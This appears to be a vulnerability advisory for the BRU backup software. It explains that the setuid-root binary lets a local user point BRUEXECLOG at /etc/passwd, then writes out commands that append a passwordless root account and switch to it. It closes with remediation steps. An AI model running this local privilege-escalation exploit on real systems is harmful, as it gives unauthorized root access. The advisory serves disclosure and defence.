COMMAND

    bru

SYSTEMS AFFECTED

    Those using bru

PROBLEM

    Riley Hassell found  a vulnerability in  BRU during his  'Security
    Contest' for his company.  BRU is backup software.

    You can change  the log file  BRU uses by  changing the BRUEXECLOG
    environment variable.  Since bru is setuid root you can append  to
    any file on the system.

    Exploitation:

        $ BRUEXECLOG=/etc/passwd
        $ export BRUEXECLOG
        $ bru -V '
        > comsec::0:0::/:/bin/sh
        > '
        $ su comsec
        #

SOLUTION

    By default, BRU  is installed setuid  root.  If  it isn't, and  is
    run by a non-root user, it complains:

        bru: [W171] warning - BRU must be owned by root and have suid bit set

    Many (most) users  who install BRU  probably never think  to check
    if its installed setuid.  Should  it be?  Probably not, but  it is
    a very real vulnerability under a default install.

    Solution for Caldera OpenLinux:

        - If you do not need BRU, issue as root: rpm -e BRU
        - Otherwise remove the suid-root bit by issuing as root: chmod u-s /bru/bru /bin/bru
        - If you want to use BRU  as a normal user, you have to  point
          the 'BRUEXECLOG' environment variable to a file writeable by
          the user, like
          bash/sh:
            BRUEXECLOG=~/.brulog
            export BRUEXECLOG

          tcsh/csh:
            setenv BRUEXECLOG=~/.brulog